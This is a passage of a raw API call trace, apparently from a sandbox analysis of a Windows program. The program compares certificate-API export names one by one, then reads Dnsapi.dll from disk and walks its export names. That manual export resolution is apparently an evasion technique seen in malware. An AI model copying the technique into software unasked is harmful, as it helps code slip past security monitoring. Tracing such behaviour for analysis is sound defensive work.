lpString2="CertAddEncodedCRLToStore") returned -1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0190.146] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0190.147] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0190.147] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.147] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0190.147] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0190.147] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.148] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.149] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.149] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.149] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.149] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.149] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0190.149] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.149] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.150] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.151] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.151] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0190.151] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.151] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.427] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.428] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.429] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.429] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.429] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0190.429] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0190.429] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0190.429] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0190.429] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0190.429] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0190.429] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0190.429] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0190.429] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0190.429] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0190.430] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0190.430] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0190.431] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0190.432] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0190.449] GetProcessHeap () returned 0x590000 [0190.449] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40c4040 | out: hHeap=0x590000) returned 1 [0190.458] GetProcessHeap () returned 0x590000 [0190.458] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9340 [0190.459] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0190.626] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0190.627] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0190.627] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0190.627] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0190.628] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0190.628] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0190.628] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0190.628] GetProcessHeap () returned 0x590000 [0190.628] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa7b88) returned 0x3a3d010 [0190.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0190.630] ReadFile (in: hFile=0x17c, lpBuffer=0x3a3d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a3d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0190.647] CloseHandle (hObject=0x17c) returned 1 [0190.647] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0190.648] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.648] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0190.648] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.648] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.648] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0190.648] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.648] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.648] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0190.648] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0190.648] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.648] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.648] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0190.648] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0190.648] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0190.648] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.648] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.648] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0190.648] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0190.648] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.649] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0190.649] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.649] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.649] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0190.649] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0190.649] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.649] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0190.649] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0190.649] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0190.649] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0190.649] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0190.649] lstrcmpA (lpString1="DnsAcquireContextHandle_A", 